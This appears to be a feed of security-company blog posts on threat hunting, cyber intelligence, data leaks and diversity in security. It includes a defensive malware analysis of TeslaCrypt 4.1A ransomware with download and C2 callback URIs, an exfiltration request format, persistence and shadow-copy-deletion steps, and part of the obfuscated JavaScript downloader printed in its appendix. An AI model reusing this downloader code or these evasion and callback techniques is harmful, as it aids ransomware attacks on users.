Organizations must keep operations running smoothly, and don’t have time for detection and prevention approaches that slow down, or even worse, disrupt, their business operations. Simultaneously, adversary hunters must have the ability to respond and protect networks — observing, containing, or evicting an adversary from the network. A majority of security solutions today either interrupt business processes, or require companies to completely shut down processes, which puts themselves at risk and impacts their bottom line. To ensure continuation of operations while adversary hunting, the hunt team must be able to discretely isolate the malicious activity, surgically removing it, while businesses maintain normal business operations.

These are a few essential requirements for organizations to consider when hunting in their networks. To learn more detail about Endgame’s hunt approach, come meet us at the SANS Threat Hunting Summit next week or see our latest point of view here.

 

Improving Network Defense with the Big Picture of Cyber Intel

$
0
0

From the moment I stepped into the defensive computer operations (DCO) arena fifteen years ago, I noticed almost immediately an invisible but very real separation between DCO and its supporting intelligence components.  It seemed the majority of network defenders I encountered paid insufficient attention to the intelligence which could be derived or made available through public and private partnerships.  Defenders were largely disinterested in trends or attribution, but rather only wanted to react to “the now”, quickly clean up, and move on.  Was this because at that point in time (circa 2000) the DCO community was mainly worried about worms, viruses and the occasional script-kiddie? Was it because the threats were more one off in nature as opposed to being characterized by the calculated persistent and sophisticated attacks that are pervasive in our community today? Despite these differences and the evolution that has occurred in the cyber domain over the last fifteen years, this invisible divide between defense and intelligence has not entirely disappeared. I was reminded of this after reading an article published by my colleague Andrea Little Limbago in Federal News Radio. Andrea asserts, “A spear phishing campaign by a state-sponsored group aimed at defense contractors to extract blueprints for next-generation technologies has extraordinarily distinct implications from a transnational criminal organization's spear phishing campaign aimed at stealing personal information to sell on the black market." The conflation of the various cyber actors, means, and objectives that Andrea describes epitomizes the importance of big-picture cyber intelligence to complete DCO.

Because I entered the world of DCO with an intelligence-oriented background, I carried into my new domain the same core analytical values that propelled my drive and curiosity throughout my former life.  As I progressed through my DCO career, I always maintained my “Five W’s + H” mindset (who, what, when, where, why and how). But, as a network defender, my primary focus was “the now”. My priorities, as with any network defender, were to keep the bad guys out, keep the critical information in, and keep systems up and running. With so much focus on the immediate threat, it’s easy to miss out on the bigger picture, which provides a wealth of information for more comprehensive detection and prevention. The following four scenarios epitomize this tension between DCO and intelligence, and how a more comprehensive integration of all available data points can inform a multi-layer detection approach and more proactive defense.

 

Scenario One: Phishing Emails

An area where intelligence can add value to a network defender’s mission involves one of the most common ingress points into a network– email.  Countless times daily, phishing emails are distributed across the globe, attempting to spread their nefarious wares.  Fortunately, filters have become pretty good at thwarting those attacks by preventing the malicious email messages from reaching their intended recipients or dropping the attached payload.  While this is great news for network defenders, these email messages are a potential source of useful intelligence.

Whereas traditional network defense might focus solely on the malware itself, looking also at the recipients may provide intelligence that can improve defenses against future attacks.  If the recipients are all from the same department within an organization, this could indicate the source of the attack (thinking back to Andrea’s point that different types of actors should be more clearly delineated).  An IT department with valuable IP and network diagrams might be more likely to be targeted by a state-sponsored element, whereas a finance and accounting department may be targeted by a criminal organization.  Having this type of data could provide valuable situational awareness and help determine where to expend future defensive resources and measures.

For example, if every PKI Administrator from a nation-wide organization received an email directing them to apply updates by following the link in the body of the email, it would be wise to investigate this further.  Determining whether the emails reached any of the intended targets, whether they were opened, and whether links were clicked is essential.  In parallel, it can be equally important to find out what would take place in the event a user clicked and was exploited.  This could provide network defenders, hunters, or incident responders with leads for identifying potential compromises within their network.  These analytical finding can be incorporated into an overall network defense posture.

 

Scenario Two: Malware Trends

Some phishing campaigns are more ‘spray and pray’ than ‘targeted’.  In the spray and pray case, the adversary’s intent is to hit a large number of targets and then take advantage of those that stick.  The malware footprint can provide insight into the adversary’s intent, going a long way towards augmenting the overall big cyber intelligence picture.  Malware variants can (and do) change over time, and some of those changes can provide valuable intelligence. In addition to providing big picture insights, this intelligence can also feed into dynamic detection capabilities, such as semi-supervised machine learning, that require both tactical but also big picture malware trends.

As a network defender, I routinely analyze different variants of a particular malware family associated with phishing campaigns, identifying their root cause, and taking the time to do the analysis even in cases where the email was blocked in transit or at the host.  Changes that enable the new malware variant to bypass the current host based mitigations can be identified through this analysis. Our host-based strategies were immediately updated to focus on preventing these malware variants, and we were protected before a piece of that new malware variant ever made it through our email defensive layer.

For example, a remote administration tool (RAT) can be used to control a system through an unauthorized back door.  There's a chance the attacker wouldn’t need to rely on a resolved DNS query in order to return to the victimized host - their backdoor would probably allow for that, especially if it were a very targeted attack (the attacker would most likely be very aware of the compromised host or the attacked entity).  If the RAT’s C2 domain was on a DNS blacklist, and analysis stopped there, the attacker could have free reign to a network.  Finding the root cause of malicious activity always has the possibility of great rewards from a defensive standpoint.

If I had worked only in “the now”, focusing on just thwarting the malware ingress point rather than doing a deeper analysis, intelligence on updates to the malware would have been lost, hindering our ability to preemptively deploy updated defensive strategies.  Therefore, while delivery mitigations are critically important, focusing only on the delivery side can cause organizations to miss out on portions of the bigger picture that could lead to better intelligence and better prevention.

 

Scenario Three: Blacklisted Domain Names

One common practice in DCO is to place known bad domain names on a blacklist.  The blacklist will most likely be populated with the malicious 3rd level domain (3LD) such as ‘bad.domain.com’, or at times at the 2nd level domain (2LD) such as ‘domain.com’.  The blacklist will then prevent a system from connecting to that particular domain.  Does this mean the blacklist will thwart an attack?  Not necessarily—it simply means the attack may be incapable of reaching its full impact due to the blacklist.  Therefore, if a system attempts to connect to the known malware reach back domain "bad.domain.com”, there's a reasonably high degree of certainty that malware is on the system.  

To provide a real-world example, imagine ‘bad.domain.com’ is on a blacklist, and the DNS query doesn’t resolve to an IP address.  At this point of malware failure, some organizations will cite it as a successful mitigation.  After all, the malware couldn't connect out.  Some would choose to move on to the next event while never attempting to find the system (or catalyst) for the malicious DNS query. In other words, a single attack may have been kept from reaching fruition, but the responsible malware could very well still be on the system or network.  If not found and remediated, it will likely pick right where it left off as soon as the mitigation strategy is removed or the compromised system is relocated to an unprotected network (as can be the case with laptops).

Merely blocking a known malicious domain is insufficient, since finding the catalyst can lead to a plethora of other malicious findings.  What if twenty or more DNS queries for ‘bad.domain.com’ were blocked or mitigated?  What would this mean?  It could mean that one system was infected, trying to beacon out or phone home.  Conversely, it could indicate that twenty separate systems were infected.  Let’s imagine it was the latter.  It’s possible an attacker infiltrated the network and is moving laterally through the network, installing malicious implants along the way.  I worked a case once where this exact scenario played out.  Taking it one step further though, what if all the affected systems were part of the same group, let’s say the admin group?  That would be scary.

 

Scenario Four: Hard-coded IP Addresses

One of the first things I get asked when analyzing a piece of malware is “where does it reach back to?”  Most often the requester is thinking in terms of the 3LD acting as the C2 domain.  However, not all malware reaches back to a domain; some reach back to a static IP address, while others reach back to both. The malicious 3LD or 2LD may be blocked, but when a static IP address is involved, a DNS blacklist won’t prevent subsequent network communications to the IP address.  A direct connection to an IP address doesn’t require DNS.  Therefore, it’s possible for a bad actor to bypass a DNS blacklist.  I’ve had a love/hate relationship with more than a few pieces of APT malware with this exact communications profile.  By identifying and analyzing the malware behind the DNS query, other tactics, techniques and procedures (TTPs) used by the malware can be uncovered, and fed back into an organization’s network defense posture.

 

Conclusion

These are just some examples to demonstrate the importance of incorporating more cyber intelligence and “big picture” thinking into the DCO community and of expanding its current focus on mitigations. To become better at containing and eliminating malware, we need to pay attention not only to the attack, but also, as Andrea suggests, to the critical delineations among various actors, means, objectives, and targets that can be derived from a deeper integration of intelligence and analysis into the DCO domain. Using intelligence to remain vigilant even after an attack is thwarted can improve a network defender’s chances of success. Rather than simply finding the malware and removing it from the system, it should be analyzed for potential future intelligence value, and feed into broader, proactive defenses that provide multiple layers of detection. Analyzing the malware as part of a broader intelligence picture and incorporating those insights into analysis and automated detection has enormous potential to help disrupt and prevent future attacks.

The Power Law of the Digital Pen: Adding Fuel to the Fire of Social Change

$
0
0

Over five years ago, the Arab Spring demonstrated the power of the digital domain in facilitating political and social change. The role of social media – still relatively nascent globally at that point – dominated the headlines and analyses as the core vehicle for shaping political debates and serving as an organizational mechanism. However, it wasn’t social media itself, but arguably the WikiLeaks revelations that provided the initial trigger. The WikiLeaks release of 1.7 GB of data was among the first manifestations of how a data leak can fuel the fire of social change (for better or worse). Last week’s Panama Papers provided yet another reminder of how the digital domain can foment social and political change. At 260 GB of data, the Panama Papers not only are the world’s largest data leak, but they also reflect the growing intersection of data breaches and social change. Data breaches and leaks have directly and indirectly resulted in the resignation of a world leader (e.g. Iceland Prime Minister Sigmundur Davio Gunnlaugsson), toppled CEOs (e.g., Target), and may potentially contribute to the demise of sports royalty (e.g, Lionel Messi, FIFA President Gianni Infantino). With no clear end in sight to the data revelations, world leaders’ responses are largely differentiated based on regime-type, with the domestic situation driving damage control. With 140 political leaders and over fifty companies referenced in the Panama Papers, this certainly is just the beginning. These initial responses are likely a harbinger of what to expect over the next year as both corporate executives and political leaders prepare their incident response to the leaks.

The Panama Papers are indicative of the growing ease with which vast amounts of digital data can be exfiltrated. In fact, it is plausible that the size of data breaches can be grouped with other social events that follow a power law distribution, such as the magnitude of interstate conflict or terrorist events, as well as the distribution of income or connectivity on the Internet. In each case, the impact of this socio-technical interplay is strongly influenced by the regime type, ranging from authoritarian on one side to solidified democracy on the other, with a wide spectrum in between. The ongoing data breaches and leaks similarly do not exist in a vacuum, which is why we are already witnessing wide scale and differentiated responses to the Panama Papers. For instance, the Chinese government has turned to its go-to and proven approach of Internet censorship to block any reference to the numerous family members of elite officials who are referenced in the Panama Papers. Conversely, Russia’s Vladimir Putin – whose inner circle is implicated in the Panama Papers – predictably calls the revelations nothing more than Western propaganda, and fits into his narrativethat “Russia is in a state of information warfare with the West.”  

Many former Eastern bloc states are also implicated, but there likely will be vast differences in how well they fare in light of the data leaks. Countries with weak opposition and/or embedded propaganda machines, such as Azerbaijan, will navigate the data revelation storm better than countries already in the midst of a corruption scandal, like Kazakhstan. Ukraine fits into this latter category, as the country’s Prime Minister just resigned amid an extant corruption crisis, which includes the President who is under tighter scrutiny thanks to the Panama Papers. Brazil similarly was already in the middle of a political corruption scandal when the Panama Papers implicated a broad spectrum of Brazil’s political elite. Interestingly, Dilma Rousseff may actually benefit from the leaks, as her main opponent faces much harsher allegations stemming from the Panama Papers than does Rousseff herself. United Kingdom’s David Cameron – already dealing with a chaotic climate instigated by a potential exit from the European Union – is now on the offensive to counter allegations of corruption associated with his father within the Panama Papers. He released his tax returns less than a week after the Panama Papers were revealed, and since then other members of the British political elite have likewise released their tax records.

So what does all of this mean? It’s well past time to consider and prepare for the diverse means that the digital domain can now greatly influence anything from nation-state stability to executive leadership of corporations. Social media is certainly one aspect, but with the growing data breaches and leaks, there will be increasingly reputational impact that can have profound repercussions across the globe. In some cases, this could actually lead to greater transparency and calls for reforms. Conversely, this could prove to be a major challenge for capitalism,  especially in democracies that are already experiencing populist movements. Regardless, as long as data growth continues to exceed Moore’s Law, the size of data leaks and breaches is likely to continue to grow, with social, political and economic repercussions across the globe.


Shifting the Narrative to Attract More Talent into Security

$
0
0

When talking with women about the cybersecurity industry, we always ask, “What do you think of when you hear the term hacker?” The response invariably describes a young, shady, socially-challenged guy working on his own in the dark. This is one of the many reasons why we also invariably have women come up to us after the discussion and say, “I had never even considered tech as a career option.”  This is one of the hurdles the industry must overcome in order to pull from a much more diverse talent pool and change the momentum of the regressive statistics on women in cybersecurity (where women account for anywhere from 8-11% of the workforce depending on the source). To reverse this downward momentum, security’s narrative must change – not just because it’s the right thing to do, but also to address security’s hot talent pipeline (in a tight talent market, we must be able to “fish in the whole sea” of potential candidates), and because diversity of all kinds is what drives innovation. 

 

Changing the narrative, a little bit at a time, was our goal today as we had the great privilege to welcome 65 sophomore girls from New York City’s Brearley School to our Arlington office to talk about the breadth of opportunities available to them in security.

 

After we provided an overview of our backgrounds, the industry, policy challenges, and building a culture to attract and retain a phenomenal and diverse workforce, it was time for Q&A. The students did not disappoint, asking insightful questions about the balance between security and privacy, how to transition from idea to product, and for tips on how they can protect themselves on-line. Just as importantly, they did not ask about the challenges of women in tech. This is meaningful. When girls start thinking about security both as something that impacts their daily life and as a field filled with opportunities and endless puzzles that require input from a range of disciplines and perspectives to solve, then we know the momentum will shift. Our hope is that we at least planted a few seeds about security as a field where women belong and can make a huge difference, helping change that narrative a little bit at a time.

 

Your Package Has Been Successfully Encrypted: TeslaCrypt 4.1A and the Malware Attack Chain

$
0
0

Introduction

Ransomware quickly gained national headlines in February after the Hollywood Presbyterian Medical Center in Los Angeles paid $17,000 in bitcoins to regain access to its systems.  Since then, other hospitals have similarly been attacked with ransomware, leading some industry experts to proclaim it an industry-specific crisis. Although it is commonly associated with directed campaigns aimed at high-value targets such as hospitals, ransomware is actually becoming less targeted and more omnidirectional. As our latest research on TeslaCrypt demonstrates, ransomware not only is becoming more widespread, but it is also becoming more sophisticated and adaptable. TeslaCrypt 4.1A  is only a week old and contains an even greater variety of stealth and obfuscation techniques than its previous variants, the earliest of which is just over a year old. Organizations and individuals alike must be aware ransomware is equally likely to be found in personal networks as in critical infrastructure networks, and that its rapid transformation and growing sophistication presents significant challenges to the security community and significant threats to users of all kinds.

 

History and Current Reality of Ransomware

Ransomware has been around for at least a decade, but its evolution and frequency have exploded over the last half year. In its early days, ransomware was relatively unsophisticated, uncommon, and more targeted. However, ransomware now largely involves code reuse, slight modifications to older families, and a variety of spam campaigns. Capabilities that once were the discrete realm of APTs are now accessible to attackers with fewer resources. TeslaCrypt 4.1A is indicative of this larger trend, integrating a variety of obfuscation techniques – such as AV evasion, anti-debugging, and stealth – into a powerful and rapidly changing piece of malware. Moreover, the incentive structure has shifted. Ransomware aimed at high-value targets depends entirely on getting one fish to bite, and so the ransom value is much higher. As the graphic below illustrates, with the proliferation of ransomware via widespread spam campaigns, attackers can demand smaller sums of money, which can still be extremely lucrative because it only requires infiltration of a small percentage of targets.

 

Campaign Overview

Last week, an Endgame researcher was analyzing spam emails for indications of emergent malicious activity.  The researcher came upon an interesting set of emails, which were soon determined to be part of a widespread spam campaign. The emails all highlighted the successful delivery of a package, which can be tracked by simply clicking on a link. This is especially interesting timing.  At the peak of procrastinators filing their taxes at the last minute, those who send in their tax forms are exactly the technically less-sophisticated users these kinds of campaigns target.  

We rapidly determined that this spam campaign was attempting to broadly deliver TeslaCrypt 4.1A to individuals.  In the subsequent sections, we’ll detail the various stages of the TeslaCrypt 4.1A attack chain, moving from infiltration to detection evasion, anti-analysis and evasion features, entrenchment, and the malicious mission, concluding with some points on the user experience. This integration of various obfuscation and deception techniques is indicative of the larger trend in ransomware toward more sophisticated and multi-faceted capabilities.

 

1.   During infiltration, the downloader mechanism is attached as a zipped JavaScript file.
2.   This JavaScript file is a downloader that uses the local environment's Windows Script Host (WSH) or wscript to download the payload. When the ZIP file is decompressed and the JavaScript file is executed, the WSH will be invoked to execute the code.
3.   The downloader proceeds to download the TeslaCrypt implant via a HTTP GET request to greetingsyoungqq[.]com/80.exe. This binary will then be launched by the downloader.
4.   To evade debuggers, the binary uses QueryPerformance/GetTickCount evasion technique to check the runtime performance as well as threading.
5.   Next, the binary allocates heap memory to allocate a PE in memory. This PE does the following:
           a. It establishes an inter-process communication channel with the CoInitialize(), CoCreateInstance()                  APIs to communicate through DirectShow in order to establish various strings in memory.
           b. Uses QueryPerformance/GetTickCount debugging evasion technique
           c. Uses Wow64DisableWow64FsRedirection to disable file system redirection for the calling thread.
           d. Deletes Zone.Identifier ADS after successful execution
           e. Checks token membership for System Authority
6.   Next, the PE drops a copy of itself to the %UserProfile%\Documents\[12 random a-z characters].exe, creates a child process, and adds SeDebugPrivilege to the newly spawned process while in a separate thread
7.   Deletes parent binary using  %COMSPEC% /C DEL %S
8.   Creates mutex "__wretw_w4523_345" for more threading activity and runs a shell command to delete volume shadow copies
9.   It entrenches the binary into the registry via a startup run key
10. During the encrypting, it generates the public key based on the encrypted private key.
11. The implant begins encrypting all accessible files on the file system based on the file extensions in the appendix.
12. Finally, it displays the ransom note in three forms: text, image, and web page. The binary will then notify the C2 server of the presence of a new victim.

 

Delivery and the Downloader

In this instance, TeslaCrypt is delivered using a zipped email attachment containing a JavaScript downloader:

Email Spam Attack

 

Email contents

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<title>RE:</title>

</head>

<body>

<pre style="font-style: strong">

Your package has been successfully delivered. The proof of delivery (TRK:299736593) is enclosed down below.

</pre>

</body>

</html>

The ZIP attachment will contain one file: transaction_wcVSdU.js. When the ZIP is decompressed and the JavaScript file is executed by the user, the Windows Script Host will launch and execute the JavaScript.  The downloader initiates a HTTP GET request to the following URI in order to download the TeslaCrypt payload (6bfa1c01c3af6206a189b975178965fe):

http://greetingsyoungqq[.]com/80.exe:

As of 4-14-2016, this URI is inactive.

If the request is successful, the binary will be written to disk in the current user's %TEMP% directory and launched by the JavaScript.

The payload (80.exe) was not being flagged by most popular AV products on the day that we detected the malware, likely due to the obfuscation employed.  A few days later, about 40% of AV vendors had updated their signatures to catch 80.exe, and a week later, a significant majority of AV vendors will flag this file as malicious.  However, this wouldn’t help users who were victimized on the first day.

 

TeslaCrypt 4.1A Implant Variant Details

Version information contained within its metadata helps the implant masquerade itself as an official Windows system DLL:

 

 

 

 

 

 

 

Upon execution, the implant unpacks itself by allocating and writing a clean PE file to heap memory. The clean PE that is invoked contains the implant’s intended malicious functionality.

 

Anti-Analysis and Evasion Features

This malware exhibits some interesting anti-analysis and evasion features which speak to its sophistication level.  We will describe some of these below.

String Obfuscation

In order to evade detection and hide many of its string extractions, the binary utilizes an inter-process communications channel (COM objects). By using the CoInitialize and CoCreateInstance Windows APIs, the implant can control DirectShow via Software\Microsoft\DirectShow\PushClock using a covert channel, utilizing the quartz libraries.

 

Anti-Debugging

TeslaCrypt calls its anti-debugging function many times to thwart automated debugging or API monitoring. By using the QueryPerformance / GetTickCount evasion technique, the process stores the timer count at the beginning of an operation and then records it at the end of the operation. If the malware is being debugged, this time difference will be much more than the normal execution time expected.

 

Anti-Monitoring

This TeslaCrypt variant contains a routine designed to terminate five standard Windows administrative / process monitoring applications. The binary enumerates all active processes and utilizes GetProcessImageFileName to retrieve the executable filename for each process. A process will be terminated if its filename contains any of the following strings:

taskmgr (Task Manager)

regedi (Registry Editor)

procex (SysInternals Process Explorer)

msconfi (System Configuration)

cmd (Command Shell)

 

Entrenchment

The implant drops a copy of itself to disk:

%UserProfile%\Documents\[12 random a-z characters].exe

In order to establish persistence, the implant adds a registry value that points to the dropped copy:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run\%s\ SYSTEM32\CMD.EXE /C START %USERPROFILE%\Documents\[12 random a-z characters].exe

 

The malware also sets the EnableLinkedConnections registry key:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections

By setting this key (which was also something done by previous versions of TeslaCrypt), network drives become available to both regular users and administrators.  This will allow the implant to easily access and encrypt files on connected network shares in addition to encrypting files on the local hard drive.  In a connected business environment, this could substantially increase the damage done by the tool.

 

Malicious Mission

TeslaCrypt relies mostly on scare tactics to corner victims into paying the ransom. In reality, it’s making false claims about its encryption usage and has recovery mechanisms that can help users recover files.

 

Encryption

Even though the malware's ransom message claims that the encryption used is RSA-4096, this algorithm is not used in any way. Instead, files are encrypted with AES256 CBC. In the encryption function it first generates the various keys which uses standard elliptic curve secp256k1 libraries which is typical for bitcoin related authors. An example of these keys can be seen in memory in the hex view below detailing memory status during master key generation. Once the keys are generated, they are then saved in %USERPROFILE%\Documents\desctop._ini and %USERPROFILE%\Documents\-!recover!-!file!-.txt. If the malware detects that a file named "desctop._ini" already exists at the specified path, it will not start the key pair generation or encrypt any files because it already assumes that the files have already been encrypted.

 

secp256k1 functions used for master key generation:

 

Generated Keys

 

Memory during the Master key generation:

 

desctop.ini

 

-!recover!-!file!-.txt

 

Callback Routine

If the binary successfully encrypts the targeted files on the host, it spins off a thread and initiates a callback routine that attempts HTTP POST requests to six different URIs:

loseweightwithmysite[.]com/sys_info.php

helcel[.]com/sys_init.php

thinktrimbebeautiful[.]com[.]au/sys_init.php

lorangeriedelareine[.]fr/sys_init.php

bluedreambd[.]com/inifile.php

onguso[.]com/inifile.php

The requests are formatted as such:

POST http://loseweightwithmysite[.]com/sys_info.php

UserAgent: Mozilla/5.0 (Windows NT 6.3 rv:11.0) like Gecko

Content-Type: application/x-www-form-urlencoded

*/*

data=550EF3E0F3BC2E175190FA31F0F440EC9FB7F1AA325D2C42645A173A1C19F6F14E291E1C6F3ADB48CFAAABB3EE79E98D43D3F227DB13D3BEFB

955ECAB1500D8C5F76DC27E141CA5EA1855D71C8CEC592702694AD29E2631BBB6AC79734C569F42897765D9E1E3A04DE9784A87

The "data" POST variable is used to transmit data that is used by the threat actor to track their victims. This data includes host configuration information, version information pertaining to the implant, a randomly generated bitcoin address (where the affected user is instructed to direct their ransom payment), and key data needed to initiate a recovery of the encrypted files. This information is placed in a query string format and will be subsequently encrypted and encoded prior to transmission in the POST request:

Sub=[Ping: hardcoded callback mode]&dh=[combination of public and private key data]&addr=[bitcoin address generated at runtime]&size=0&version=[4.1a: hardcoded TeslaCrypt version number]&OS=[OS build number derived from VersionInformation.dwBuildNumber]&ID=[821: appears to be a hardcoded value possibly used to further identify a particular variant]&inst_id=[user ID generated at runtime]

Provided below is a string with sample data:

Sub=Ping&dh=04803B73A04A81984A83DB117D8D2C46678A5C3B828E55D265B0A4413FC248194F26505A967943D9FF05A7B5EC7DBF981BDADEB7702D98EA

BA5D492B6429112FFC1478F386804A9CF31E38821425545563D7BCB9CC2BD46EA4FCAADD4BF473E6BD&addr=18px5E1cPWkEkT67TU14RgZ9g9dWbC3jfr&size=0&version=

4.1a&OS=7601&ID=821&inst_id=D19191ED8D504416

 

The query string will then be AES encrypted:

 

An ASCII representation of the binary output of the AES encryption will then be written to memory:

 

This data will then be attached to the "data" POST variable and transmitted in the request.

If the implant successfully issues a POST request and receives a valid response from the callback server, the thread will terminate. The thread will also terminate if it does not receive a valid response after attempting one request to each of the callback servers.

Aside from the "Ping" mode (designated in the Sub query string variable), the binary also references a separate "Crypted" callback mode, though this mode does not appear to be accessible in this particular variant.

 

User Experience

The ransom information is displayed using 3 methods:

1) HTML page

2) text file

3) PNG image

These files will also be written to disk in nearly every directory on the file system.  The links for a real victim’s will reference the victim’s unique ID which facilitates payment tracking and decryption should the ransom be paid.

 

HTML (-!RecOveR!-xdyxv++.Htm)

 

TXT (-!RecOveR!-xdyxv++.Txt)

 

PNG (-!RecOveR!-xdyxv++.Png)

 

Conclusion

TeslaCrypt 4.1A is indicative of the broader trend we’re seeing in ransomware. While the targeted, high-value targets dominate the press, ransomware is increasingly opportunistic as opposed to targeted. These randomized spam campaigns rely on infiltrating a very small percentage of targets, but are still extremely lucrative given their widespread dispersion. In addition, the shortened time-frame between variants also reflects the trends in ransomware over the last 6-12 months. The speed to update between variants is shrinking, while the sophistication is increasing. This makes reverse engineering the malware more onerous, including the use of deception techniques such as misleading researchers that RSA-4096 encryption is used when in reality it was AES-256. In short, not only does the spam campaign attempt to deceive potential targets, but TeslaCrypt 4.1A also aims to mislead and stay ahead of researchers attempting to reverse engineer it. Only four months into 2016, as our timeline demonstrates, this may very well be the year of the ransomware attack. These kinds of opportunistic attacks can be very lucrative and sophisticated, and should increasingly be on the radar of both high-value organizations as well as individuals.

 

Appendix

Email Header (Email originally forwarded from [redacted].org

Delivered-To: [redacted]@gmail.com

Received: by [redacted] with SMTP id t129csp1570097vkf;

       Mon, 11 Apr 2016 10:49:37 -0700 (PDT)

X-Received: by [redacted] with SMTP id g19mr11538193ote.175.1460396977496;

       Mon, 11 Apr 2016 10:49:37 -0700 (PDT)

Return-Path: <HallimondRandy164@zhongda89.com>

Received: from mail-oi0-f50.google.com (mail-oi0-f50.google.com. )

       by mx.google.com with ESMTPS id 9si7641149ott.222.2016.04.11.10.49.37

       for <[redacted]@gmail.com>

       (version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128);

       Mon, 11 Apr 2016 10:49:37 -0700 (PDT)

Received-SPF: softfail (google.com: domain of transitioning HallimondRandy164@zhongda89.com does not designate [redacted] as permitted sender) client-ip=[redacted];

Authentication-Results: mx.google.com;

      spf=softfail (google.com: domain of transitioning HallimondRandy164@zhongda89.com does not designate [redacted] as permitted sender) smtp.mailfrom=HallimondRandy164@zhongda89.com

Received: by mail-oi0-f50.google.com with SMTP id y204so196057727oie.3

       for <[redacted]@gmail.com>; Mon, 11 Apr 2016 10:49:37 -0700 (PDT)

X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;

       d=1e100.net; s=20130820;

       h=x-original-authentication-results:x-gm-message-state:message-id

        :from:to:subject:date:reply-to:mime-version;

       bh=+IHT+KX3SwGYMwaiqhwtBParNXFx58iS7BjXXX3f3hg=;

       b=aF7RbWAEZMTRaddOFbhKFi9ghacPytB5mK2/YwImzNr2GFAvOyVR6yfsOEk8B3XdKZ

        Oc1kESzLaBtRB2PBS5Se66Utxg4a6TBNAWQanuxMthDFUERgQgaA+xae+7uiKLMYrnJC

        rmdIqEuNJ31hq6EaBBHdSwmtBfSfR4q9s4uOZWCuPI+iIzGAW8aUOHxWVDiZDXJCJOA2

        D8AHo5/yUmosn0zFHUo6nThJF5KQKzgPPaYka9avNhFFXUYwXp9RjUKGN+2MDmoOYnWC

        YoYgxZs275cd7cI1hH27ESf60U8aSvjnhh6q5oTTZgfSdekFAhA+MyY7onvGomj4kzAZ

        ju1A==

X-Original-Authentication-Results: gmr-mx.google.com;       spf=softfail (google.com: domain of transitioning HallimondRandy164@zhongda89.com does not designate [redacted] as permitted sender) smtp.mailfrom=HallimondRandy164@zhongda89.com

X-Gm-Message-State: AOPr4FUtA2HQqGRu+GdZuu8wADNknK4b73v+HF33ILQuYoMSQUrg45myopzxVcSix38piF2Nek5YQwvPOL2fGuTPayrRew==

X-Received: by [redacted] with SMTP id 10mr7798207otm.47.1460396976918;

       Mon, 11 Apr 2016 10:49:36 -0700 (PDT)

Return-Path: <HallimondRandy164@zhongda89.com>

Received: from dsl-187-156-10-25-dyn.prod-infinitum.com.mx ()

       by gmr-mx.google.com with ESMTP id y20si1822157pfa.2.2016.04.11.10.49.36

       for <[redacted]@gmail.com>;

       Mon, 11 Apr 2016 10:49:36 -0700 (PDT)

Received-SPF: softfail (google.com: domain of transitioning HallimondRandy164@zhongda89.com does not designate [redacted] as permitted sender) client-ip=[redacted];

Message-ID: <[redacted]@[redacted].org>

From: =?UTF-8?B?UmFuZHkgSGFsbGltb25k?= <HallimondRandy164@zhongda89.com>

To: =?UTF-8?B?a2ZkaG5l?= <[redacted]@[redacted].org>

Subject: =?UTF-8?B?UkU6?=

Date: Mon, 11 Apr 2016 12:49:34 -0500

Reply-To: =?UTF-8?B?a2ZkaG5l?= <[redacted]@[redacted].org>

MIME-Version: 1.0

 

JavaScript downloader (Nemucod) 0eec3406dfb374a7df4c2bb856db1625 Contents:

var fuXYgBL="WS";

eval(function(p,a,c,k,e,d){e=function(c){return c};if(!"".replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return"\\w+"};c=1};while(c--){if(k[c]){p=p.replace(new RegExp("\\b"+e(c)+"\\b","g"),k[c])}}return p}("0 1=2;",3,3,("var|XqTfkKcqqex|"+fuXYgBL+"cript").split("|"),0,{}))

function zrISJA(jjcxUlc) {

return "hrsaSzYzlaFzEc";

}

function NZwY(FmoOw,RNqcI) {

var FiPpmI=["ohRoOlCB","\x77"+"\x72\x69","\x74\x65"];FmoOw[FiPpmI[1]+FiPpmI[2]](RNqcI)

}

function jEiG(EJmRb) {

var fVxQNBM=["\x6F\x70"+"\x65\x6E"];EJmRb[fVxQNBM[421-421]]();

}

function wYGJ(HhQGZ,cpllk,bDxjN) {

pHah=HhQGZ;

//QVWzPmJWZVSK

pHah.open(bDxjN,cpllk,false);

}

function yrlc(ikMyP) {

if (ikMyP == 1077-877){return true;} else {return false;}

}

function Sgix(UFQtP) {

if (UFQtP > 155282-909){return true;} else {return false;}

}

function tMlUn(cpqParen,kwDT) {

return "";

}

function UAUJ(jNuMk) {

var nLaSHyDA=["\x73\x65"+"\x6E\x64"];

jNuMk[nLaSHyDA[0]]();

}

function uOFx(JEEUB) {

return JEEUB.status;

}

function eBRRZTo(higo,fYcgC) {

ozMRhEh=[];

ozMRhEh.push(higo.ExpandEnvironmentStrings(fYcgC));

return ozMRhEh[0];

}

function iIeFEEW(eArZ) {

var buDOHaq=("\x72\x65\x73\x70\x6F\x6E*\x73\x65\x42\x6F\x64\x79").split("*");

return eArZ[buDOHaq[0]+buDOHaq[1]];

}

function Ybru(IUgdY,FzFmU) {

var usIIR=("\x54\x6F\x46*\x69\x6C\x65*\x73\x61*\x76\x65").split("*");

var gqfLYpEf=usIIR[344-344];

var FAebRf=usIIR[987-985]+usIIR[309-306]+gqfLYpEf+usIIR[522-521];

var jnEpuJY=[FAebRf];IUgdY[jnEpuJY[788-788]](FzFmU,609-607);

}

function LZZFymKZ(IfJ) {

return IfJ.size;

}

function NpkPo(KefYQK) {

var WEgJ=["\x70\x6F\x73\x69\x74\x69\x6F\x6E"];

return KefYQK[WEgJ[904-904]]=114-114;

}

function MnruB(qpl,HKtRA) {

var nweM=["\x73\x70\x6C\x69\x74"];

return qpl[nweM[0]](HKtRA);

}

function FZyc(WHpHj) {

eTtPIgs=XqTfkKcqqex.CreateObject(WHpHj);

return eTtPIgs;

}

function HrwpH(bNbUPp) {

var nviK=bNbUPp;

return new ActiveXObject(nviK);

}

function OixB(ocfZi) {

var DYsBj="";

T=(159-159);

do {

if (T >= ocfZi.length) {break;}

if (T % (686-684) != (803-803)) {

var WyZLN = ocfZi.substring(T, T+(620-619));

DYsBj += WyZLN;

}

T++;

} while(true);

return DYsBj;

}

